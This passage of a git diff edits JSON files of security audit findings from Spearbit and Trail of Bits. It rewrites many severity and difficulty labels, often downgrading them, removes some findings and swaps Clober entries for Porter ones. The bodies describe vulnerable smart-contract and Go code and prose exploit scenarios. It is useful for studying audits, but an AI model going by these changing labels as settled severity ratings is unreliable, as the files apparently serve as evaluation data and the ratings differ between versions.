the E; alternatively, replace S * C with N. The issue isn't entirely resolved though, as it becomes C * ((S * C * E) ** (L - 1)) = 4 * ((2 * 4 * 2) ** 3) = 16384, or 2 ** 14. The same applies to _MAX_NODES_P.", + "title": "Non-existent bonds naming/symbol restrictions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "The issuer can define any name and symbol during bond creation. Naming is neither enforced nor constructed by the contract and may result in abusive or misleading names, which could have a negative impact on the PR of the project. /// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone) A malicious user could hypothetically use arbitrary names to: Mislead users into thinking they are buying bonds consisting of different tokens. Use abusive names to discredit the team. Attempt to exploit the frontend application by injecting arbitrary HTML data. The team had a discussion regarding naming conventions in the past. However, not all the abovementioned scenarios were brought up during that conversation. Therefore, this finding is reported as informational to revisit and estimate its potential impact, or add it as a test case during the web application implementation.", "labels": [ "Spearbit", - "Clober", + "Porter", "Severity: Informational" ] }, { - "title": "marketOrder() with expendOutput reverts with SlippageError with max tolerance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "During the audit the Clober team raised this issue.
Added here to track the fixes.", + "title": "Needless variable initialization for default values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "uint256 variables are initialized to a default value of zero per the Solidity docs. Setting a variable to the default value is unnecessary.", "labels": [ "Spearbit", - "Clober", - "Severity: High Risk" + "Porter", + "Severity: Informational" ] }, { - "title": "Wrong OrderIndex could be emitted at Claim() event.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "During the audit the Clober team raised this issue. Added here to track the fixes.", + "title": "Deflationary payment tokens are not handled in the pay() function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "The pay() function does not support rebasing/deflationary/inflationary payment tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "Porter", + "Severity: Informational" ] } ] \ No newline at end of file diff --git a/results/tob_findings.json index 94241d6..4d21dea 100644 --- a/results/tob_findings.json +++ b/results/tob_findings.json @@ -5,7 +5,7 @@ "body": "API key verification is handled by the AuthKey function (figure 1.1). This function uses the auth method, which passes the plaintext value of a key to the database (as part of the database query), as shown in figure 1.2. func (s *CustomerStore) AuthKey(ctx context.Context, key string) (*clap.User, error) { internalUser, err := s.authInternalKey(ctx, key) if err == store.ErrInvalidAPIKey { return s.auth(ctx, \"auth_api_key\", key) } else if err != nil { return nil, err } return internalUser, nil } Figure 1.1: The call to the auth method (clap/internal/dbstore/customer.go#L73-L82) func (s *CustomerStore) auth(ctx context.Context, funName string, value interface{}) (*clap.User, error) { user := &clap.User{ Type: clap.UserTypeCustomer, } err := s.db.QueryRowContext(ctx, fmt.Sprintf(` SELECT ws.sid, ws.workspace_id, ws.credential_id FROM console_clap.%s($1) AS ws LEFT JOIN api.disabled_user AS du ON du.user_id = ws.sid WHERE du.user_id IS NULL LIMIT 1 `, pq.QuoteIdentifier(funName)), value).Scan(&user.ID, &user.WorkspaceID, &user.CredentialID) ... } Figure 1.2: The database query, with an embedded plaintext key (clap/internal/dbstore/customer.go#L117-L141) Moreover, keys are generated in the database (figure 1.3) rather than in the Go code and are then sent back to the API, which increases their exposure. gk := &store.GeneratedKey{} err = tx.QueryRowContext(ctx, ` SELECT sid, key FROM console_clap.key_request() `).Scan(&gk.CustomerID, &gk.Key) Figure 1.3: clap/internal/dbstore/customer.go#L50-L53 Exploit Scenario An attacker gains access to connection traffic between the application server and the database, steals the API keys being transmitted, and uses them to impersonate their owners. Recommendations Short term, have the API hash keys before sending them to the database, and generate API keys in the Go code. This will reduce the keys' exposure.
Long term, document the trust boundaries traversed by sensitive data.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, @@ -15,7 +15,7 @@ "body": "The clap code contains an unused insecure authentication mechanism, the FixedKeyAuther strategy, that stores configured plaintext keys (figure 2.1) and verifies them through a non-constant-time comparison (figure 2.2). The use of this comparison creates a timing attack risk. /* if cfg.Server.SickMode { if cfg.Server.ApiKey == \"\" { log15.Crit(\"In sick mode, api key variable must be set in config\") os.Exit(1) } auther = FixedKeyAuther{ ID: -1, Key: cfg.Server.ApiKey, } } else*/ Figure 2.1: clap/server/server.go#L57-L67 type FixedKeyAuther struct { Key string ID int64 } func (a FixedKeyAuther) AuthKey(ctx context.Context, key string) (*clap.User, error) { if key != \"\" && key == a.Key { return &clap.User{ID: a.ID}, nil } return nil, nil } Figure 2.2: clap/server/auth.go#L19-L29 Exploit Scenario The FixedKeyAuther strategy is enabled. This increases the risk of a key leak, since the authentication mechanism is vulnerable to timing attacks and stores plaintext API keys in memory. Recommendations Short term, to prevent API key exposure, either remove the FixedKeyAuther strategy or change it so that it uses a hash of the API key. Long term, avoid leaving commented-out or unused code in the codebase.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: High" ] }, @@ -25,8 +25,8 @@ "body": "The clap HTTP handler mechanism uses panic to handle errors that can be triggered by users (figures 3.1 and 3.2). Handling these unusual cases of panics requires the mechanism to filter out errors of the RequestError type (figure 3.3). The use of panics to handle expected errors alters the panic semantics, deviates from callers' expectations, and makes reasoning about the code and its error handling more difficult. func (r *Request) MustUnmarshal(v interface{}) { ... err := json.NewDecoder(body).Decode(v) if err != nil { panic(BadRequest(\"Failed to parse request body\", \"jsonErr\", err)) } } Figure 3.1: clap/lib/clap/request.go#L31-L42 // MustBeAuthenticated returns user ID if request authenticated, // otherwise panics. func (r *Request) MustBeAuthenticated() User { user, err := r.User() if err == nil && user == nil { err = errors.New(\"user is nil\") } else if !user.Valid() { err = errors.New(\"user id is zero\") } if err != nil { panic(Error(\"not authenticated: \" + err.Error())) } return *user } Figure 3.2: clap/lib/clap/request.go#L134-L147 defer func() { if e := recover(); e != nil { if err, ok := e.(*RequestError); ok { onError(w, r, err) } else { panic(e) } } }() Figure 3.3: clap/lib/clap/handler.go#L93-L101 Recommendations Short term, change the code in figures 3.1, 3.2, and 3.3 so that it adheres to the conventions of handling expected errors in Go. This will simplify the error-handling functionality and the process of reasoning about the code. Reserving panics for unexpected situations or bugs in the code will also help surface incorrect assumptions. Long term, use panics only to handle unexpected errors.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: Low" ] }, { @@ -35,8 +35,8 @@ "body": "The clap HTTP endpoint handler code appears to indicate that the handlers perform manual endpoint authentication. This is because when a handler receives a clap.Request, it calls the MustBeAuthenticated method (figure 4.1).
The name of this method could imply that it is called to authenticate the endpoint. However, MustBeAuthenticated returns information on the (already authenticated) user who submitted the request; authentication is actually performed by default by a centralized mechanism before the call to a handler. Thus, the use of this method could cause confusion regarding the timing of authentication. func (h *AlertsHandler) handleGet(r *clap.Request) interface{} { // Parse arguments q := r.URL.Query() var minSeverity uint64 if ms := q.Get(\"minSeverity\"); ms != \"\" { var err error minSeverity, err = strconv.ParseUint(ms, 10, 8) if err != nil || minSeverity > 5 { return clap.BadRequest(\"Invalid minSeverity parameter\") } } if h.MinSeverity > minSeverity { minSeverity = h.MinSeverity } filterEventType := q.Get(\"eventType\") user := r.MustBeAuthenticated() ... } Figure 4.1: clap/apiv1/alerts.go#L363-L379 Recommendations Short term, add a ServeAuthenticatedAPI interface method that takes an additional user parameter, indicating that the handler is already in the authenticated context. Long term, document the authentication system to make it easier for new team members and auditors to understand and to facilitate their onboarding.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -55,8 +55,8 @@ "body": "In several parts of the ae code, files are created with overly broad permissions that allow them to be read by anyone on the system. This occurs in the following code paths: ae/tools/copy.go#L50 ae/bqimport/import.go#L291 ae/tools/migrate.go#L127 ae/tools/migrate.go#L223 ae/tools/migrate.go#L197 ae/tools/copy.go#L16 ae/main.go#L319 Recommendations Short term, change the file permissions, limiting them to only those that are necessary. Long term, always consider the principle of least privilege when making decisions about file permissions.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Undetermined" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -65,8 +65,8 @@ "body": "The gosec tool identified many unhandled errors in the ae and clap codebases. Recommendations Short term, run gosec on the ae and clap codebases, and address the unhandled errors. Even if an error is considered unimportant, it should still be handled and discarded, and the decision to discard it should be justified in a code comment. Long term, encourage the team to use gosec, and run it before any major release.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -85,7 +85,7 @@ "body": "Every account that the Token Program operates on should be owned by the Token Program, but several instructions lack account ownership checks. The functions lacking checks include process_reallocate, process_withdraw_withheld_tokens_from_mint, and process_withdraw_withheld_tokens_from_accounts. Many of these functions have an implicit check for this condition in that they modify the account data, which is possible only if the account is owned by the Token Program; however, future changes to the associated code could remove this protection. For example, in the process_withdraw_withheld_tokens_from_accounts instruction, neither the mint_account_info nor destination_account_info parameter is checked to ensure the account is owned by the Token Program. While the mint account's data is mutably borrowed, the account data is never written.
As a result, an attacker could pass a forged account in place of the mint account. Conversely, the destination_account_info account's data is updated by the instruction, so it must be owned by the Token Program. However, if an attacker can find a way to spoof an account public key that matches the mint property in the destination account, he could bypass the implicit check. Recommendations Short term, as a defense-in-depth measure, add explicit checks of account ownership for all accounts passed to instructions. This will both improve the clarity of the codebase and remove the dependence on implicit checks, which may no longer hold true when updates occur.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: Medium" ] }, @@ -95,7 +95,7 @@ "body": "Running the cargo audit command uncovered the use of one crate with a known vulnerability (time). cargo audit Fetching advisory database from `https://github.com/RustSec/advisory-db.git` Loaded 458 security advisories (from /Users/andershelsing/.cargo/advisory-db) Updating crates.io index Scanning Cargo.lock for vulnerabilities (651 crate dependencies) Crate: time Version: 0.1.44 Title: Potential segfault in the time crate Date: 2020-11-18 ID: RUSTSEC-2020-0071 URL: https://rustsec.org/advisories/RUSTSEC-2020-0071 Solution: Upgrade to >=0.2.23 Figure 3.1: The result of running the cargo audit command Recommendations Short term, triage the use of the vulnerability in the time crate and upgrade the crate to a version in which the vulnerability is patched.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Undetermined", "Difficulty: Low" ] }, @@ -105,17 +105,7 @@ "body": "The call to try_from in the init_extension function returns an error if the length of the given extension is larger than u16::MAX, which causes the unwrap operation to panic. let length = pod_get_packed_len::(); *length_ref = Length::try_from(length).unwrap(); Figure 4.1: https://github.com/solana-labs/solana-program-library/token/program-2022/src/extension/mod.rs#L493-L494 Recommendations Short term, add assertions to the program to catch extensions whose sizes are too large, and add relevant code to handle errors that could arise in the try_from function. This will ensure that the Token Program does not panic if any extension grows larger than u16::MAX.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Undetermined" - ] - }, - { - "title": "5. Unescaped components in PostgreSQL connection string ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The PostgreSQL scaler creates a connection string by formatting the configured host, port, username, database name, SSL mode, and password with fmt.Sprintf: meta.connection = fmt.Sprintf( \"host=%s port=%s user=%s dbname=%s sslmode=%s password=%s\" , host, port, userName, dbName, sslmode, password, ) Figure 5.1: pkg/scalers/postgresql_scaler.go#L127-L135 However, none of the parameters included in the format string are escaped before the call to fmt.Sprintf. According to the PostgreSQL documentation, To write an empty value, or a value containing spaces, surround it with single quotes, for example keyword = 'a value'. Single quotes and backslashes within a value must be escaped with a backslash, i.e., \\' and \\\\.
As KEDA does not perform this escaping, the connection string could fail to parse if any of the configuration parameters (e.g., the password) contains symbols with special meaning in PostgreSQL connection strings. Furthermore, this issue may allow the injection of harmful or unintended parameters into the connection string using spaces and equal signs. Although the latter attack violates assumptions about the application's behavior, it is not a severe issue in KEDA's case because users can already pass full connection strings via the connectionFromEnv configuration parameter. Exploit Scenario A user configures the PostgreSQL scaler with a password containing a space. As the PostgreSQL scaler does not escape the password in the connection string, when the client connection is initialized, the string fails to parse, an error is thrown, and the scaler does not function. Recommendations Short term, escape the user-provided PostgreSQL parameters using the method described in the PostgreSQL documentation. Long term, use the custom Semgrep rule provided in Appendix C to detect future instances of this issue.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: Low" ] }, @@ -126,7 +116,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Medium" + "Difficulty: Low" ] }, { @@ -145,7 +135,7 @@ "body": "The get_extension_indices function returns either the indices for a given extension type or the first uninitialized slot. Because a TLV data record can never be deleted, the first zero-value entry of the slice should indicate that the iteration has reached the end of the used data space. However, if the init parameter is false, the start_index index is advanced by two, and the iteration continues, presumably iterating over empty data until it reaches the end of the TLV data for the account. while start_index < tlv_data.len() { let tlv_indices = get_tlv_indices(start_index); if tlv_data.len() < tlv_indices.value_start { return Err(ProgramError::InvalidAccountData); } ... // got to an empty spot, can init here, or move forward if not initing if extension_type == ExtensionType::Uninitialized { if init { return Ok(tlv_indices); } else { start_index = tlv_indices.length_start; } } ... Figure 7.1: https://github.com/solana-labs/solana-program-library/token/program-2022/src/extension/mod.rs#L96-L122 Recommendations Short term, modify the associated code so that it terminates the iteration when it reaches uninitialized data, which should indicate the end of the used TLV record data.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: Low" ] }, @@ -156,7 +146,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -165,8 +155,8 @@ "body": "The comments on the MINT_WITH_EXTENSION variable are incorrect. See figure 9.1 for the incorrect comments, highlighted in red, and the corrected comments, highlighted in yellow.
const MINT_WITH_EXTENSION: &[u8] = &[ /* Figure 9.1 (byte layout garbled in extraction): the base mint bytes and padding, followed by trailing fields whose comments are off by one: the byte commented as the extension type is really the account type (1), the bytes commented as the length are really the extension type (3, 0), the bytes commented as the data are really the extension length (32, 0), and the remaining 32 bytes are really the extension data. */ ]; Figure 9.1: https://github.com/solana-labs/solana-program-library/blob/50abadd819df2e406567d6eca31c213264c1c7cd/token/program-2022/src/extension/mod.rs#L828-L841 Recommendations Short term, update the comments to align with the data. This will ensure that developers working on the tests will not be confused by the data structure.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Low" ] }, { @@ -176,7 +166,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -185,7 +175,7 @@ "body": "For confidential transfers, the pending balance is split into lo and hi values: of the total 64 bits representing the value, lo contains the low 16 bits, and hi contains the high 48 bits. Some instructions seem to update only the lo bits. For example, the process_destination_for_transfer function updates only the pending_balance_lo field of the destination_confidential_transfer_account account. Changing the ct_withdraw_withheld_tokens_from_accounts integration test so that the resulting fee is greater than u16::MAX (and updating the test to account for other changes to account balances) breaks the test, which indicates that the pattern of updating only the lo bits is problematic. We found the same pattern in the process_withdraw_withheld_tokens_from_mint function for the destination_confidential_transfer_account account and in the process_withdraw_withheld_tokens_from_accounts function for the destination_confidential_transfer_account account. #[cfg(feature = \"zk-ops\")] fn process_destination_for_transfer( destination_token_account_info: &AccountInfo, mint_info: &AccountInfo, destination_encryption_pubkey: &EncryptionPubkey, destination_ciphertext_lo: &EncryptedBalance, destination_ciphertext_hi: &EncryptedBalance, encrypted_fee: Option, ) -> ProgramResult { check_program_account(destination_token_account_info.owner)?; ...
// subtract fee from destination pending balance let new_destination_pending_balance = ops::subtract( &destination_confidential_transfer_account.pending_balance_lo, &ciphertext_fee_destination, ).ok_or(ProgramError::InvalidInstructionData)?; // add encrypted fee to current withheld fee let new_withheld_amount = ops::add( &destination_confidential_transfer_account.withheld_amount, &ciphertext_fee_withheld_authority, ).ok_or(ProgramError::InvalidInstructionData)?; destination_confidential_transfer_account.pending_balance_lo = new_destination_pending_balance; destination_confidential_transfer_account.withheld_amount = new_withheld_amount; ... Figure 11.1: https://github.com/solana-labs/solana-program-library/token/program-2022/src/extension/confidential_transfer/processor.rs#L761-L777 Recommendations Short term, investigate the security implications of operating only on the lo bits and determine whether this pattern should be changed.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Undetermined", "Difficulty: High" ] }, @@ -196,7 +186,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Medium" + "Difficulty: Low" ] }, { @@ -216,7 +206,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -236,7 +226,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: Low" ] }, { @@ -245,7 +235,7 @@ "body": "The getLatestPrice function retrieves a specific asset price from Chainlink. However, the price (a signed integer) is only checked to be non-zero and is then cast to an unsigned integer, even though its value may be negative. An incorrect price would temporarily affect the expected amount of fund assets during liquidation. function getLatestPrice(address asset_) external override view returns (uint256 latestPrice_) { // If governor has overridden price because of oracle outage, return overridden price. if (manualOverridePrice[asset_] != 0) return manualOverridePrice[asset_]; ( uint80 roundId_, int256 price_, , uint256 updatedAt_, uint80 answeredInRound_ ) = IChainlinkAggregatorV3Like(oracleFor[asset_]).latestRoundData(); require(updatedAt_ != 0, \"MG:GLP:ROUND_NOT_COMPLETE\"); require(answeredInRound_ >= roundId_, \"MG:GLP:STALE_DATA\"); require(price_ != int256(0), \"MG:GLP:ZERO_PRICE\"); latestPrice_ = uint256(price_); } Figure 5.1: getLatestPrice function (globals-v2/contracts/MapleGlobals.sol#297-308) Exploit Scenario Chainlink's oracle returns a negative value for an in-process liquidation. This value is then unsafely cast to a uint256. The expected amount of fund assets from the protocol is incorrect, which prevents liquidation. Recommendations Short term, check that the price is greater than 0. Long term, add tests for the Chainlink price feed with various edge cases. Additionally, set up a monitoring system in the event of unexpected market failures. A Chainlink oracle can have a minimum and maximum value, and if the real price is outside of that range, it will not be possible to update the oracle; as a result, it will report an incorrect price, and it will be impossible to know this on-chain.", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Low", "Difficulty: High" ] },
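A sketch of the short-term recommendation from the getLatestPrice finding above, strengthening the existing require so a negative answer can never be cast; the error string is illustrative:

// Reject zero and negative answers before the int256 -> uint256 cast.
require(price_ > int256(0), "MG:GLP:INVALID_PRICE");
latestPrice_ = uint256(price_);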
@@ -255,8 +255,8 @@ "body": "The Pool implementation of EIP-4626 is incorrect for maxDeposit and maxMint because these functions do not consider all possible cases in which deposit or mint are disabled. EIP-4626 is a standard for implementing tokenized vaults. In particular, it specifies the following: maxDeposit: MUST factor in both global and user-specific limits. For example, if deposits are entirely disabled (even temporarily), it MUST return 0. maxMint: MUST factor in both global and user-specific limits. For example, if mints are entirely disabled (even temporarily), it MUST return 0. The current implementation of maxDeposit and maxMint in the Pool contract directly calls and returns the result of the same functions in PoolManager (figure 6.1). As shown in figure 6.1, both functions rely on _getMaxAssets, which correctly checks that the liquidity cap has not been reached and that deposits are allowed, and otherwise returns 0. However, these checks are insufficient. function maxDeposit(address receiver_) external view virtual override returns (uint256 maxAssets_) { maxAssets_ = _getMaxAssets(receiver_, totalAssets()); } function maxMint(address receiver_) external view virtual override returns (uint256 maxShares_) { uint256 totalAssets_ = totalAssets(); uint256 totalSupply_ = IPoolLike(pool).totalSupply(); uint256 maxAssets_ = _getMaxAssets(receiver_, totalAssets_); maxShares_ = totalSupply_ == 0 ? maxAssets_ : maxAssets_ * totalSupply_ / totalAssets_; } [...] function _getMaxAssets(address receiver_, uint256 totalAssets_) internal view returns (uint256 maxAssets_) { bool depositAllowed_ = openToPublic || isValidLender[receiver_]; uint256 liquidityCap_ = liquidityCap; maxAssets_ = liquidityCap_ > totalAssets_ && depositAllowed_ ? liquidityCap_ - totalAssets_ : 0; } Figure 6.1: The maxDeposit and maxMint functions (pool-v2/contracts/PoolManager.sol#L451-L461) and the _getMaxAssets function (pool-v2/contracts/PoolManager.sol#L516-L520) The deposit and mint functions have a checkCall modifier that will call the canCall function in the PoolManager to allow or disallow the action. This modifier first checks if the global protocol pause is active; if it is not, it will perform additional checks in _canDeposit. For this issue, it will be impossible to deposit or mint if the Pool is not active. function canCall(bytes32 functionId_, address caller_, bytes memory data_) external view override returns (bool canCall_, string memory errorMessage_) { if (IMapleGlobalsLike(globals()).protocolPaused()) { return (false, \"PM:CC:PROTOCOL_PAUSED\"); } if (functionId_ == \"P:deposit\") { ( uint256 assets_, address receiver_ ) = abi.decode(data_, (uint256, address)); return _canDeposit(assets_, receiver_, \"P:D:\"); } if (functionId_ == \"P:depositWithPermit\") { ( uint256 assets_, address receiver_, , , , ) = abi.decode(data_, (uint256, address, uint256, uint8, bytes32, bytes32)); return _canDeposit(assets_, receiver_, \"P:DWP:\"); } if (functionId_ == \"P:mint\") { ( uint256 shares_, address receiver_ ) = abi.decode(data_, (uint256, address)); return _canDeposit(IPoolLike(pool).previewMint(shares_), receiver_, \"P:M:\"); } if (functionId_ == \"P:mintWithPermit\") { ( uint256 shares_, address receiver_, , , , , ) = abi.decode(data_, (uint256, address, uint256, uint256, uint8, bytes32, bytes32)); return _canDeposit(IPoolLike(pool).previewMint(shares_), receiver_, \"P:MWP:\"); } [...]
function _canDeposit(uint256 assets_, address receiver_, string memory errorPrefix_) internal view returns (bool canDeposit_, string memory errorMessage_) { if (!active) return (false, _formatErrorMessage(errorPrefix_, \"NOT_ACTIVE\")); if (!openToPublic && !isValidLender[receiver_]) return (false, _formatErrorMessage(errorPrefix_, \"LENDER_NOT_ALLOWED\")); if (assets_ + totalAssets() > liquidityCap) return (false, _formatErrorMessage(errorPrefix_, \"DEPOSIT_GT_LIQ_CAP\")); return (true, \"\"); } Figure 6.2: The canCall function (pool-v2/contracts/PoolManager.sol#L370-L393), and the _canDeposit function (pool-v2/contracts/PoolManager.sol#L498-L504) The maxDeposit and maxMint functions should return 0 if the global protocol pause is active or if the Pool is not active; however, these cases are not considered. Exploit Scenario A third-party protocol wants to deposit into Maple's pool. It first calls maxDeposit to obtain the maximum amount of assets it can deposit and then calls deposit. However, the latter function call will revert because the protocol is paused. Recommendations Short term, return 0 in maxDeposit and maxMint if the protocol is paused or if the pool is not active. Long term, maintain compliance with the EIP specification being implemented (in this case, EIP-4626).", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { @@ -265,7 +255,7 @@ "body": "The administrative functions setAllowedSlippage and setMinRatio have a requirement that they can be called only by the poolManager. However, they are not called by any reachable function in the PoolManager contract. function setAllowedSlippage(address collateralAsset_, uint256 allowedSlippage_) external override { require(msg.sender == poolManager, \"LM:SAS:NOT_POOL_MANAGER\"); require(allowedSlippage_ <= HUNDRED_PERCENT, \"LM:SAS:INVALID_SLIPPAGE\"); emit AllowedSlippageSet(collateralAsset_, allowedSlippageFor[collateralAsset_] = allowedSlippage_); } function setMinRatio(address collateralAsset_, uint256 minRatio_) external override { require(msg.sender == poolManager, \"LM:SMR:NOT_POOL_MANAGER\"); emit MinRatioSet(collateralAsset_, minRatioFor[collateralAsset_] = minRatio_); } Figure 7.1: setAllowedSlippage and setMinRatio function (pool-v2/contracts/LoanManager.sol#L75-L85) Exploit Scenario Alice, a pool administrator, needs to adjust the slippage parameter of a particular collateral token. Alice's transaction reverts since she is not the poolManager contract address. Alice checks the PoolManager contract for a method through which she can set the slippage parameter, but none exists. Recommendations Short term, add functions in the PoolManager contract that can reach setAllowedSlippage and setMinRatio on the LoanManager contract. Long term, add unit tests that validate that all system parameters can be updated successfully.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] }, @@ -296,7 +286,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: High" ] }, { @@ -306,7 +296,7 @@ "labels": [ "Trail of Bits", "Severity: Undetermined", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -315,17 +305,7 @@ "body": "The _disburseLiquidationFunds and _distributeClaimedFunds functions, which send the fees to the various actors, do not check that the mapleTreasury address was set.
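A hedged sketch of the missing guard this finding describes (the TreasuryNotSet error type is hypothetical; mapleTreasury() is assumed to be the accessor shown in figure 12.1 below):

pragma solidity ^0.8.4;

abstract contract TreasuryGuard {
    error TreasuryNotSet(); // hypothetical error type

    function mapleTreasury() public view virtual returns (address);

    // Revert early instead of silently transferring fees to address(0).
    function _requireTreasurySet() internal view returns (address treasury_) {
        treasury_ = mapleTreasury();
        if (treasury_ == address(0)) revert TreasuryNotSet();
    }
}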
Although the mapleTreasury address is supposedly set immediately after the creation of the MapleGlobals contract, no checks prevent sending the fees to the zero address, leading to a loss for Maple. function _disburseLiquidationFunds(address loan_, uint256 recoveredFunds_, uint256 platformFees_, uint256 remainingLosses_) internal returns (uint256 updatedRemainingLosses_, uint256 updatedPlatformFees_) { [...] require(toTreasury_ == 0 || ERC20Helper.transfer(fundsAsset_, mapleTreasury(), toTreasury_), \"LM:DLF:TRANSFER_MT_FAILED\"); Figure 12.1: The _disburseLiquidationFunds function (pool-v2/contracts/LoanManager.sol#L566-L584) Exploit Scenario Bob, a Maple admin, sets up the protocol but forgets to set the mapleTreasury address. Since there are no warnings, the expected claim or liquidation fees are sent to the zero address until the Maple team notices the issue. Recommendations Short term, add a check that the mapleTreasury is not set to address zero in _disburseLiquidationFunds and _distributeClaimedFunds. Long term, improve the unit and integration tests to check that the system behaves correctly both for the happy case and the non-happy case.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: N/A" - ] - }, - { - "title": "1. Reliance on third-party library for deployment ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "Due to the use of the delegatecall proxy pattern, some NFTX contracts cannot be initialized with their own constructors; instead, they have initializer functions. These functions can be front-run, allowing an attacker to initialize contracts incorrectly. function __NFTXInventoryStaking_init(address _nftxVaultFactory) external virtual override initializer { __Ownable_init(); nftxVaultFactory = INFTXVaultFactory(_nftxVaultFactory); address xTokenImpl = address(new XTokenUpgradeable()); __UpgradeableBeacon__init(xTokenImpl); } Figure 1.1: The initializer function in NFTXInventoryStaking.sol:37-42 The following contracts have initializer functions that can be front-run: NFTXInventoryStaking NFTXVaultFactoryUpgradeable NFTXEligibilityManager NFTXLPStaking NFTXSimpleFeeDistributor The NFTX team relies on hardhat-upgrades, a library that offers a series of safety checks for use with certain OpenZeppelin proxy reference implementations to aid in the proxy deployment process. It is important that the NFTX team become familiar with how the hardhat-upgrades library works internally and with the caveats it might have. For example, some proxy patterns like the beacon pattern are not yet supported by the library. Exploit Scenario Bob uses the library incorrectly when deploying a new contract: he calls upgradeTo() and then uses the fallback function to initialize the contract. Eve front-runs the call to the initialization function and initializes the contract with her own address, which results in an incorrect initialization and Eve's control over the contract. Recommendations Short term, document the protocol's use of the library and the proxy types it supports. Long term, use a factory pattern instead of the initializer functions to prevent front-running of the initializer functions.", - "labels": [ - "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] },
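For illustration, a minimal sketch of an EIP-165 implementation for a contract that receives ERC721 tokens (interface definitions are inlined so the sketch is self-contained; this is not Paraspace code):

pragma solidity ^0.8.4;

interface IERC165 {
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

interface IERC721TokenReceiver {
    function onERC721Received(address operator, address from, uint256 tokenId, bytes calldata data)
        external returns (bytes4);
}

contract ReceiverWithIntrospection is IERC165, IERC721TokenReceiver {
    function onERC721Received(address, address, uint256, bytes calldata) external pure override returns (bytes4) {
        return IERC721TokenReceiver.onERC721Received.selector;
    }

    // EIP-165: report support for every interface the contract implements.
    function supportsInterface(bytes4 interfaceId) external pure override returns (bool) {
        return interfaceId == type(IERC165).interfaceId || interfaceId == type(IERC721TokenReceiver).interfaceId;
    }
}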
Outside of the dependencies and mocks directories, only one Paraspace contract has a supportsInterface function. For example, each of the following contracts includes an onERC721Received function; therefore, they should have a supportsInterface function that returns true for the ERC721TokenReceiver interface (PoolCore's onERC721Received implementation appears in figure 3.1): contracts/ui/MoonBirdsGateway.sol contracts/ui/UniswapV3Gateway.sol contracts/ui/WPunkGateway.sol contracts/protocol/tokenization/NToken.sol contracts/protocol/tokenization/NTokenUniswapV3.sol contracts/protocol/tokenization/NTokenMoonBirds.sol contracts/protocol/pool/PoolCore.sol // This function is necessary when receive erc721 from looksrare function onERC721Received( address, address, uint256, bytes memory ) external virtual returns (bytes4) { return this.onERC721Received.selector; } Figure 3.1: contracts/protocol/pool/PoolCore.sol#L773-L781 Exploit Scenario Alice's contract tries to send an ERC721 token to a PoolCore contract. Alice's contract first tries to determine whether the PoolCore contract supports the ERC721TokenReceiver interface by calling supportsInterface. When the call reverts, Alice's contract aborts the transfer. Recommendations Short term, add supportsInterface functions to all contracts that implement a well-known interface. Doing so will help to ensure that Paraspace contracts can interact with external contracts. Long term, add tests to ensure that each contract's supportsInterface function returns true for the interfaces that the contract supports and false for some subset of the interfaces that the contract does not support. Doing so will help to ensure that the supportsInterface functions work correctly. References EIP-165: Standard Interface Detection EIP-721: Non-Fungible Token Standard", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: High" ] }, @@ -356,7 +336,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -365,17 +345,7 